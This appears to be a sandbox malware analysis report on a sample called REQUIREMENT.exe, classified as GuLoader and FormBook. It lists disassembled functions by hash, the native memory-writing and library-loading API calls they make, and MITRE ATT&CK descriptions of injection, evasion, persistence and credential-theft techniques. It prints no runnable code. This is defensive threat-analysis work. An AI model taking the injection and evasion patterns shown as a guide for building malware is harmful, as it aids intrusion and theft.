Opcode ID: 819988d0391cdca53990f450a08c87adfb9b22b4c5d2ef9061f2bc0ae8dc1756
Instruction ID: ac875507702de16046d423cbb31bd2f434a1a03924f70f05441879ada2b03c74
Opcode Fuzzy Hash: 819988d0391cdca53990f450a08c87adfb9b22b4c5d2ef9061f2bc0ae8dc1756
Instruction Fuzzy Hash: 4EC1C7B1600388DFDF758F29CC867DA3BA2FF59314F45812ADD499B264C7719A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 02416941, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 227COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: c00ee37ddc1e9e1c844d6d469829ee6a6fc179955ac0848b8046a8450c4399b3
Instruction ID: b46ab3f7209fafa5765f92906ee53c47b8630f44b67cce61cbd752203dbd81a5
Opcode Fuzzy Hash: c00ee37ddc1e9e1c844d6d469829ee6a6fc179955ac0848b8046a8450c4399b3
Instruction Fuzzy Hash: 2AA1A472200288DFDF758F29CC857EA3BB2FF99310F55812ADD499B224C7719A86CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0241694D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: c8f310a8804888e4010d632dfca3d1edd32f677f8b6f29ac8b0ea5dc5c849cda
Instruction ID: 4de7fa2e0deeac95b56653e0281b384e9a63cb8ed135157037de4ce3ae1bcc88
Opcode Fuzzy Hash: c8f310a8804888e4010d632dfca3d1edd32f677f8b6f29ac8b0ea5dc5c849cda
Instruction Fuzzy Hash: 2DA1A576200288DFDF758F29CD85BDA3BA6FF98310F45812ADD499B224C7719A868B41

Uniqueness

Uniqueness Score: -1.00%

Function 02416959, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 02416CBD

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: $M$d-
API String ID: 3527976591-3139223441
Opcode ID: c54539b9c8ffc482cbd8d3591c6f61f87758a4bf1c96086cf3782f2406848caf
Instruction ID: b2fd09b674eb680621b990c9edadcf00f1a76e94b677f64f9367289fa182ab13
Opcode Fuzzy Hash: c54539b9c8ffc482cbd8d3591c6f61f87758a4bf1c96086cf3782f2406848caf
Instruction Fuzzy Hash: ABA1A575200288DFDF758F29CD85BDA3BA2FF98314F45812ADD499A224C7719B868B41

Uniqueness

Uniqueness Score: -1.00%

Function 02416A8D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: e8ce822aef3c91ae92e529e06c0889b43821476737112c9895d255d3b938d879
Instruction ID: 07051b5674ce12592a13c77d6277dae19714b9594c3b98c42a40b8d825c145b9
Opcode Fuzzy Hash: e8ce822aef3c91ae92e529e06c0889b43821476737112c9895d255d3b938d879
Instruction Fuzzy Hash: A381B772644388CFDF759F29CD847DA3BA6FF98310F06812ADD889B210C7759A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02416A99, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 5769aa4fcaa6096f564398e2bdfa66ff6dc37c2df7f986dcb5f8812ed37b2de0
Instruction ID: 963896588fcb8a72d2d4aedafc700830793e958f25bc507168a07b8dcd6548cc
Opcode Fuzzy Hash: 5769aa4fcaa6096f564398e2bdfa66ff6dc37c2df7f986dcb5f8812ed37b2de0
Instruction Fuzzy Hash: 9981C872605388CFDF758F29CD447DA7BA6FF98310F46802ADD889B210C775AA82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02416AA5, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 02416CBD

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: $M$d-
API String ID: 3527976591-3139223441
Opcode ID: 3b62f6debda985b8590d1136a0c1c5c2a725bffd97c76a72e26bc8ad0b2c8716
Instruction ID: 3ae006ea24e606a53031672cc44994f49000b9a364a379eadbd0d5215fd81013
Opcode Fuzzy Hash: 3b62f6debda985b8590d1136a0c1c5c2a725bffd97c76a72e26bc8ad0b2c8716
Instruction Fuzzy Hash: 4681C872605388DFDF759F29CD847DA7BA6FF58300F45802ADD899B210C7759A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02416A5D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 177COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: da2bb060eefcfbf3dae4ab6cab25ebb97fa179c460b8ff118f4f2e2ea10c9c28
Instruction ID: 24cab96153c1af87a0aa3b52cffabc3f5c9cd5d4e8fd8758515ca311a04bc4dc
Opcode Fuzzy Hash: da2bb060eefcfbf3dae4ab6cab25ebb97fa179c460b8ff118f4f2e2ea10c9c28
Instruction Fuzzy Hash: B771C772605388DFDF759F29CD857DA7BA6FF98300F41802ADD8C9B220C7719A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 02416A69, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 174COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: f5e2c3b4b98dafaad8de276734f6e59f546cea3b88e897e1430fd104b163ebde
Instruction ID: 79dfbf586aad7a2ce0ca7d97981eaebd29bd74dbeaba274ff4e5ac7d0880b909
Opcode Fuzzy Hash: f5e2c3b4b98dafaad8de276734f6e59f546cea3b88e897e1430fd104b163ebde
Instruction Fuzzy Hash: 5371B772605388CFDF759F29CD447DA7BA6FF98300F41802ADD8C9B220C7719A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 02416A75, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 02416CBD

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: $M$d-
API String ID: 3527976591-3139223441
Opcode ID: be61e21ed421136bed445106cfa7bc29ba2928df078fa7c7b47c13135b2fbf4e
Instruction ID: 1b4d7f0e47f0df35a24dafd44c91b984e906e34910e3bd658ab0e00b46d0f1bd
Opcode Fuzzy Hash: be61e21ed421136bed445106cfa7bc29ba2928df078fa7c7b47c13135b2fbf4e
Instruction Fuzzy Hash: 7971C772604388CFDF759F29CD447DA7BA6FF98300F45802ADD889B220C7719A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02412045, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

l, xrefs: 024120C2

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: l
API String ID: 0-2517025534
Opcode ID: fce3111336460c3dffc1152e58475bae45235b0768f7a165bad2e0e39c0b97ed
Instruction ID: 94c5ea6b42cadbdfcdde8b0b6e8ab00572b5a6ac02b42c8d14dfb393d3895ac1
Opcode Fuzzy Hash: fce3111336460c3dffc1152e58475bae45235b0768f7a165bad2e0e39c0b97ed
Instruction Fuzzy Hash: 4C7196315087849BC736DF38CC943DEBBB1AF42324F18429ED998CB692C7708646CB56

Uniqueness

Uniqueness Score: -1.00%

Function 02416CE1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 02416CBD

Strings

$M, xrefs: 02416E9E

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: $M
API String ID: 3527976591-498354199
Opcode ID: a38de65c019c2c2f645aeb616766ff709b68d44f941d38cf73d11d982516dad4
Instruction ID: fda075436d3819d0aac8590edf7229fc9bc3a6306a98dab52b9c6cb64e53a0b2
Opcode Fuzzy Hash: a38de65c019c2c2f645aeb616766ff709b68d44f941d38cf73d11d982516dad4
Instruction Fuzzy Hash: F731FD75540388DFDFB98F28C840BDA3BB1FF08314F05442AED8C9A621C3369A92CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0241A8BF, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9b70a06bce648d8583238d81e27459b42c6f253e5a4c4bed79cc7564def3051
Instruction ID: 4bed500fed397a8640f16a8f160cdf34562c0f942c0b029bed94e98a8d15fd2a
Opcode Fuzzy Hash: b9b70a06bce648d8583238d81e27459b42c6f253e5a4c4bed79cc7564def3051
Instruction Fuzzy Hash: 4C410772A49298DBDF789F348D65BEA37A6AF95720F41011FEC0E9B304D7318A40CB51

Uniqueness

Uniqueness Score: -1.00%

Function 024176AD, Relevance: 1.6, APIs: 1, Instructions: 101memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 024194E5: LoadLibraryA.KERNELBASE(?,74943F2C,?,0241772D,07B490AF), ref: 02419684

NtAllocateVirtualMemory.NTDLL(201D6911,?,-67359B78), ref: 02417864

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: dc811766c31f0888bcc64f9d77105b8f2004193ee5f56a3f5cde8f1f04a0954a
Instruction ID: afc3405d7eb27da47591e2e4c9bb4a1dcff48ee5d1f8918d95158a47bba34d73
Opcode Fuzzy Hash: dc811766c31f0888bcc64f9d77105b8f2004193ee5f56a3f5cde8f1f04a0954a
Instruction Fuzzy Hash: 4841D1B46043899FEB309E39CC947EB77B2AF5A354F40412EDC898B214D7308A85CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0241B688, Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 0241B738

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 78fa469b3b9852da5db2e0d537aa403d9f82bc54015a81db79dd4d7ccd9aa116
Instruction ID: 3b80929e4d7edd9f5b88b3ef064bb5b0a36ff2c23fda7fd3710b6ab39a5b3dbd
Opcode Fuzzy Hash: 78fa469b3b9852da5db2e0d537aa403d9f82bc54015a81db79dd4d7ccd9aa116
Instruction Fuzzy Hash: F2F03C716182849FDB78CE28CD457EE77A5EB98301F00412DA849EB344C7309E00CB16

Uniqueness

Uniqueness Score: -1.00%

Function 0241742D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,42BDB9AB), ref: 02417536

Strings

p, xrefs: 02417430

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: p
API String ID: 823142352-2181537457
Opcode ID: a0ff5569318f6e7578e4edaa97960c17dc944f2a1d37b21945509c18d9c45003
Instruction ID: c0989832ed52e3fac975e95830c7f8b908e33b3ab865d8c61a7f746e6e5a635e
Opcode Fuzzy Hash: a0ff5569318f6e7578e4edaa97960c17dc944f2a1d37b21945509c18d9c45003
Instruction Fuzzy Hash: F9112275508386DFEB64EE39CA847EBBBE1EF14300F81842DC9C9A6199D7300A81CB06

Uniqueness

Uniqueness Score: -1.00%

Function 024194E5, Relevance: 1.6, APIs: 1, Instructions: 61libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,74943F2C,?,0241772D,07B490AF), ref: 02419684

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b74f09d66edd0962444207be4a7637472c23606b85ae2e75a59f4133140dc3d6
Instruction ID: 02ecc3155462e2f56d65c053ba5a96ff75e8a42ef0cd0a49e54a6c65690ef773
Opcode Fuzzy Hash: b74f09d66edd0962444207be4a7637472c23606b85ae2e75a59f4133140dc3d6
Instruction Fuzzy Hash: 96218171649698CBDF389F248D65BDE37B5AF45B10F80421BE81DCB204D7305A408A66

Uniqueness

Uniqueness Score: -1.00%

Function 02417401, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,42BDB9AB), ref: 02417536

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 45d7fcfdb5a61dd9def591d86d848f48bb23af22b8219d3a442f32e2b360f66f
Instruction ID: 7614a61d7489d78f802b58206f5b51e10def3f06cfb70de8833805f300f4d811
Opcode Fuzzy Hash: 45d7fcfdb5a61dd9def591d86d848f48bb23af22b8219d3a442f32e2b360f66f
Instruction Fuzzy Hash: 17112F76508385CFDB64DE38C9852EBBBE1EF04710F91882DC8C9A6149C3308A82CB06

Uniqueness

Uniqueness Score: -1.00%

Function 0241740D, Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,42BDB9AB), ref: 02417536

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 33a989f4028373e9e957bbb7cdb1be8f6997c75bda427d72c972c56da383c7b8
Instruction ID: 916ab3ca5e3018f9f956e6577ac5b05ec4afae8ac14359580b06fafd7d6c66c1
Opcode Fuzzy Hash: 33a989f4028373e9e957bbb7cdb1be8f6997c75bda427d72c972c56da383c7b8
Instruction Fuzzy Hash: 15112336508345CFD7649E38C9816EBBBE1EF15710F91892ECCC5A6159C7304A82CB06

Uniqueness

Uniqueness Score: -1.00%

Function 02417419, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,42BDB9AB), ref: 02417536

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b8266604247e9205a057444c0c52e71f6f4032aaccdea097f5978e85a1b815f0
Instruction ID: 4bbf38a65fefc0afd79bf52f7077ccf108c2cb01c7e20bdc0c4b7db1a351e423
Opcode Fuzzy Hash: b8266604247e9205a057444c0c52e71f6f4032aaccdea097f5978e85a1b815f0
Instruction Fuzzy Hash: 92112535508345DFD768DE39C9857EBB7E1EF15700F91842DCCCAA6059D7304982CB06

Uniqueness

Uniqueness Score: -1.00%

Function 024174F5, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecfa3bb5edab510a230b22b9ff9bf029827cfc7de6033f4848bb2d9beb15494d
Instruction ID: ef26e8c2b9ec726742171fa7679964556b3966e6b2cb19ee1e17e5b865540a7f
Opcode Fuzzy Hash: ecfa3bb5edab510a230b22b9ff9bf029827cfc7de6033f4848bb2d9beb15494d
Instruction Fuzzy Hash: A6F027365642868BE720CE2888C43EBBB54EF60731FA0C17EC94E1A1CA86315542CF14

Uniqueness

Uniqueness Score: -1.00%

Function 024174E9, Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,42BDB9AB), ref: 02417536

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0449630fafce5696039135a9610ba7b9e769e40e9e949e18f285c86dbf9b968b
Instruction ID: 4070c188dcc78f3382976bc7ab3a0bd6bfcfc0a4063739799c5feb0c68005873
Opcode Fuzzy Hash: 0449630fafce5696039135a9610ba7b9e769e40e9e949e18f285c86dbf9b968b
Instruction Fuzzy Hash: 9EE0C279510246DFE720CE14C8D4BEBB360EF44B10FA0C039CE0D5E68A87308A02CB24

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report REQUIREMENT.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Threatname: FormBook

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre